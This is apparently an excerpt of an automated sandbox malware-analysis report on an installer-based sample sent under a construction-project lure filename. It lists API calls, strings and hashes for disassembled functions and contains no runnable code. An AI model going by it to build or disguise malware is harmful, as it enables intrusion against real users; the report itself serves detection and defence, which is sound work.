                                                                                                                          • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                                                                                          • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                                                                                          • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                                                                                          • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                                                                                          Function 00404635 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                                                                                          • lstrcmpiW.KERNEL32(004271A0,004226E8,00000000,?,?), ref: 0040479C
                                                                                                                          • lstrcatW.KERNEL32(?,004271A0), ref: 004047A8
                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                                                                                            • Part of subcall function 0040574C: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040575F
                                                                                                                            • Part of subcall function 00406220: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,74DF3420,00403542), ref: 00406283
                                                                                                                            • Part of subcall function 00406220: CharNextW.USER32(?,?,?,00000000), ref: 00406292
                                                                                                                            • Part of subcall function 00406220: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,74DF3420,00403542), ref: 00406297
                                                                                                                            • Part of subcall function 00406220: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,74DF3420,00403542), ref: 004062AA
                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487C
                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404897
                                                                                                                            • Part of subcall function 004049F0: lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404A91
                                                                                                                            • Part of subcall function 004049F0: wsprintfW.USER32 ref: 00404A9A
                                                                                                                            • Part of subcall function 004049F0: SetDlgItemTextW.USER32(?,004226E8), ref: 00404AAD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: A$&B
                                                                                                                          • API String ID: 2624150263-2586977930
                                                                                                                          • Opcode ID: 6280fc6980825afd9ee0809b1ca6071d0e9f114e0af1474ec63fd39ca55c6531
                                                                                                                          • Instruction ID: 99b17f69f627c4fe70adaab035ba94d9a502da106e2b73a6a76b2d9e8e29038f
                                                                                                                          • Opcode Fuzzy Hash: 6280fc6980825afd9ee0809b1ca6071d0e9f114e0af1474ec63fd39ca55c6531
                                                                                                                          • Instruction Fuzzy Hash: ECA170B1A00209ABDB11AFA5DC85AAF77B8EF85714F10843BF601B62D1D77C89418F69
                                                                                                                          Function 332B7CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 332B7D06
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B90D7
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B90E9
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B90FB
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B910D
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B911F
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B9131
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B9143
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B9155
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B9167
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B9179
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B918B
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B919D
                                                                                                                            • Part of subcall function 332B90BA: _free.LIBCMT ref: 332B91AF
                                                                                                                          • _free.LIBCMT ref: 332B7CFB
                                                                                                                            • Part of subcall function 332B571E: HeapFree.KERNEL32(00000000,00000000,?,332B924F,?,00000000,?,00000000,?,332B9276,?,00000007,?,?,332B7E5A,?), ref: 332B5734
                                                                                                                            • Part of subcall function 332B571E: GetLastError.KERNEL32(?,?,332B924F,?,00000000,?,00000000,?,332B9276,?,00000007,?,?,332B7E5A,?,?), ref: 332B5746
                                                                                                                          • _free.LIBCMT ref: 332B7D1D
                                                                                                                          • _free.LIBCMT ref: 332B7D32
                                                                                                                          • _free.LIBCMT ref: 332B7D3D
                                                                                                                          • _free.LIBCMT ref: 332B7D5F
                                                                                                                          • _free.LIBCMT ref: 332B7D72
                                                                                                                          • _free.LIBCMT ref: 332B7D80
                                                                                                                          • _free.LIBCMT ref: 332B7D8B
                                                                                                                          • _free.LIBCMT ref: 332B7DC3
                                                                                                                          • _free.LIBCMT ref: 332B7DCA
                                                                                                                          • _free.LIBCMT ref: 332B7DE7
                                                                                                                          • _free.LIBCMT ref: 332B7DFF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 161543041-0
                                                                                                                          • Opcode ID: 3b9ad880a701e6b3c624efc9c6555800d27427cc77e9591fd923c8b3a8154d8e
                                                                                                                          • Instruction ID: a54c8e63664b37c28dc4bf40ea46f382db120835f4fef4aaf99d7a70e5b57fc5
                                                                                                                          • Opcode Fuzzy Hash: 3b9ad880a701e6b3c624efc9c6555800d27427cc77e9591fd923c8b3a8154d8e
                                                                                                                          • Instruction Fuzzy Hash: 8C314B75A00B06DFEF219A39D940B6677F9EF043D0F644869E858DB654DF71A8C0DB10
                                                                                                                          Function 00402DBC Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEC
                                                                                                                            • Part of subcall function 00405BF8: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BFC
                                                                                                                            • Part of subcall function 00405BF8: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C1E
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                                                                                          • GlobalAlloc.KERNEL32(?,00409230), ref: 00402F7C
                                                                                                                          Strings
                                                                                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                                                                                          • Inst, xrefs: 00402EA3
                                                                                                                          • soft, xrefs: 00402EAC
                                                                                                                          • Error launching installer, xrefs: 00402E0C
                                                                                                                          • Null, xrefs: 00402EB5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                          • API String ID: 2803837635-787788815
                                                                                                                          • Opcode ID: d5a77cc6bee4d90e7eda19427a8a4cf0714f505a664e78c7155da71c5f6bc0b2
                                                                                                                          • Instruction ID: 4e3209b53bdebe8ba6f789b0e0a530dabd6f5a0a3926ba0fa2d0dbc3b843d87d
                                                                                                                          • Opcode Fuzzy Hash: d5a77cc6bee4d90e7eda19427a8a4cf0714f505a664e78c7155da71c5f6bc0b2
                                                                                                                          • Instruction Fuzzy Hash: 4D610631941205ABDB209FA4DD85B9E3BB8EB04354F20457BF604B72D2C7BC9E419BAD
                                                                                                                          Function 00405FAE Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 207stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetVersion.KERNEL32(00000000,004216C8,?,0040526B,004216C8,00000000,00000000,00000000), ref: 00406071
                                                                                                                          • GetSystemDirectoryW.KERNEL32(004271A0,00000400), ref: 004060EF
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(004271A0,00000400), ref: 00406102
                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040613E
                                                                                                                          • SHGetPathFromIDListW.SHELL32(?,004271A0), ref: 0040614C
                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 00406157
                                                                                                                          • lstrcatW.KERNEL32(004271A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617B
                                                                                                                          • lstrlenW.KERNEL32(004271A0,00000000,004216C8,?,0040526B,004216C8,00000000,00000000,00000000), ref: 004061D5
                                                                                                                          Strings
                                                                                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406175
                                                                                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 004060BD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                          • API String ID: 900638850-730719616
                                                                                                                          • Opcode ID: e31b2ddd4529637651ef3c93dcef70bddb782fc6bb0b3b2f1a5ed02a94110898
                                                                                                                          • Instruction ID: 5cce0682863fafc60a16059ed1eb0c3d77be7ea2b31a2434558a531189329514
                                                                                                                          • Opcode Fuzzy Hash: e31b2ddd4529637651ef3c93dcef70bddb782fc6bb0b3b2f1a5ed02a94110898
                                                                                                                          • Instruction Fuzzy Hash: EA61D271A00115AADF209F25CC40AAF37A5EF54314F12813FE906BA2D1D73D99A2CB5E
                                                                                                                          Function 332B59D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 332B59EA
                                                                                                                            • Part of subcall function 332B571E: HeapFree.KERNEL32(00000000,00000000,?,332B924F,?,00000000,?,00000000,?,332B9276,?,00000007,?,?,332B7E5A,?), ref: 332B5734
                                                                                                                            • Part of subcall function 332B571E: GetLastError.KERNEL32(?,?,332B924F,?,00000000,?,00000000,?,332B9276,?,00000007,?,?,332B7E5A,?,?), ref: 332B5746
                                                                                                                          • _free.LIBCMT ref: 332B59F6
                                                                                                                          • _free.LIBCMT ref: 332B5A01
                                                                                                                          • _free.LIBCMT ref: 332B5A0C
                                                                                                                          • _free.LIBCMT ref: 332B5A17
                                                                                                                          • _free.LIBCMT ref: 332B5A22
                                                                                                                          • _free.LIBCMT ref: 332B5A2D
                                                                                                                          • _free.LIBCMT ref: 332B5A38
                                                                                                                          • _free.LIBCMT ref: 332B5A43
                                                                                                                          • _free.LIBCMT ref: 332B5A51
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: 886b38f2b8fd5aa715a39ae0eefa2da7d6cea8a1c262f05b3d85fc9a5fb307e6
                                                                                                                          • Instruction ID: c4403d161783e1cdcb45f3f813808ffb1ee7c88da3d23fa66bfba91d44a54c18
                                                                                                                          • Opcode Fuzzy Hash: 886b38f2b8fd5aa715a39ae0eefa2da7d6cea8a1c262f05b3d85fc9a5fb307e6
                                                                                                                          • Instruction Fuzzy Hash: 7A11597AA10248FFCF11DF54D941DDD3FB5EF08290B6541A5B9084F525DA71DAD0AB80
                                                                                                                          Function 332BAA53 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DecodePointer
                                                                                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                          • API String ID: 3527080286-3064271455
                                                                                                                          • Opcode ID: c62e2ea758a690d94e55db072cab9ad89b795d62e410451731de1690db036504
                                                                                                                          • Instruction ID: aba332673885fe540c425dc2f885c2a2684f118d6dbd77e3f4c4beb79210a6ee
                                                                                                                          • Opcode Fuzzy Hash: c62e2ea758a690d94e55db072cab9ad89b795d62e410451731de1690db036504
                                                                                                                          • Instruction Fuzzy Hash: 5351BCB491074ACBDF00DFA8EA485DCBFB5FF09390F564285E490B7214DB759AA4CB24
                                                                                                                          Function 332B1CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 332B1D1B
                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,?,00000000,?,?,00000000), ref: 332B1D37
                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 332B1D4B
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 332B1D58
                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 332B1D72
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 332B1D7D
                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 332B1D8A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1454806937-0
                                                                                                                          • Opcode ID: 29ae8ce116feb92016848e8169ff43d334335127f042f25ca6538a7bc752044f
                                                                                                                          • Instruction ID: 31b507ef1905d08571bf853efc8dc38bd5e9e22c5ad7c8108ed52d762f89bd78
                                                                                                                          • Opcode Fuzzy Hash: 29ae8ce116feb92016848e8169ff43d334335127f042f25ca6538a7bc752044f
                                                                                                                          • Instruction Fuzzy Hash: C521FFB594121DAFEB10AFA4CC8CFEB7AFCEB08394F044965F555E2140E6709E868B70
                                                                                                                          Function 00404201 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                                                                                          • GetSysColor.USER32(00000000), ref: 0040423A
                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                                                                                          • SetBkMode.GDI32(?,?), ref: 00404252
                                                                                                                          • GetSysColor.USER32(?), ref: 00404265
                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00404275
                                                                                                                          • DeleteObject.GDI32(?), ref: 0040428F
                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2320649405-0
                                                                                                                          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                          • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                                                                                          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                          • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                                                                                          Function 332B9492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,332B9C07,?,00000000,?,00000000,00000000), ref: 332B94D4
                                                                                                                          • __fassign.LIBCMT ref: 332B954F
                                                                                                                          • __fassign.LIBCMT ref: 332B956A
                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 332B9590
                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,332B9C07,00000000,?,?,?,?,?,?,?,?,?,332B9C07,?), ref: 332B95AF
                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,332B9C07,00000000,?,?,?,?,?,?,?,?,?,332B9C07,?), ref: 332B95E8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1324828854-0
                                                                                                                          • Opcode ID: 85bdf98ee7af671459f2410478efcafff34d5fdd2afd434e8cff3f53505cf76e
                                                                                                                          • Instruction ID: 2f3f33d7b4849fd98700d2a2370cb196b5043d87b6926c2b1b60312744f88920
                                                                                                                          • Opcode Fuzzy Hash: 85bdf98ee7af671459f2410478efcafff34d5fdd2afd434e8cff3f53505cf76e
                                                                                                                          • Instruction Fuzzy Hash: 9F51A3B5D04209AFDF00CFA9C895BEEBBF9EF09350F14851AE555E7281E7709981CB60
                                                                                                                          Function 00402573 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402616
                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402639
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040264F
                                                                                                                            • Part of subcall function 00405C7B: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C8F
                                                                                                                            • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2942513381.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2942494567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942546434.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942567088.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2942603725.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                                          • String ID: 9
                                                                                                                          • API String ID: 1149667376-2366072709
                                                                                                                          • Opcode ID: 25305ac4e9b43401c62344d4a8783106e8ed45d883596a7dd8de98379e43bd88
                                                                                                                          • Instruction ID: 7a29d1be5ffbe8e369a4709248b8008a71e905d773f4f6332667e592b1311aba
                                                                                                                          • Opcode Fuzzy Hash: 25305ac4e9b43401c62344d4a8783106e8ed45d883596a7dd8de98379e43bd88
                                                                                                                          • Instruction Fuzzy Hash: BB51E671E04209ABDF24DF94DA88AAEB779FF04304F50443BE501B62D0D7B99E42CB69
                                                                                                                          Function 332B3370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 332B339B
                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 332B33A3
                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 332B3431
                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 332B345C
                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 332B34B1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.2967656105.00000000332B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 332B0000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.2967631198.00000000332B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000004.00000002.2967656105.00000000332C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_332b0000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                          • String ID: csm
                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                          • Opcode ID: 8a8907a499780e1b48929226120deec45ceb0c8ccd47379384d97cdf978cf972
                                                                                                                          • Instruction ID: f7daf63a43feb2bf67cc641a924e0f5e7d81b3c8f689ea9cccd5a0065b52d4b7
                                                                                                                          • Opcode Fuzzy Hash: 8a8907a499780e1b48929226120deec45ceb0c8ccd47379384d97cdf978cf972
                                                                                                                          • Instruction Fuzzy Hash: DE41D678E00349ABCF00CF68C884E9EBBB5BF453A4F18C155EA15AB251D7B1DA85CF90
                                                                                                                          Function 004027E5 Relevance: 10.6, APIs: 7, Instructions: 75memoryfileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405BF8: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BFC
                                                                                                                            • Part of subcall function 00405BF8: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C1E
                                                                                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00402809
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040288F
                                                                                                                            • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                          • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 00402825
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 0040285E
                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?), ref: 00402870
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402877
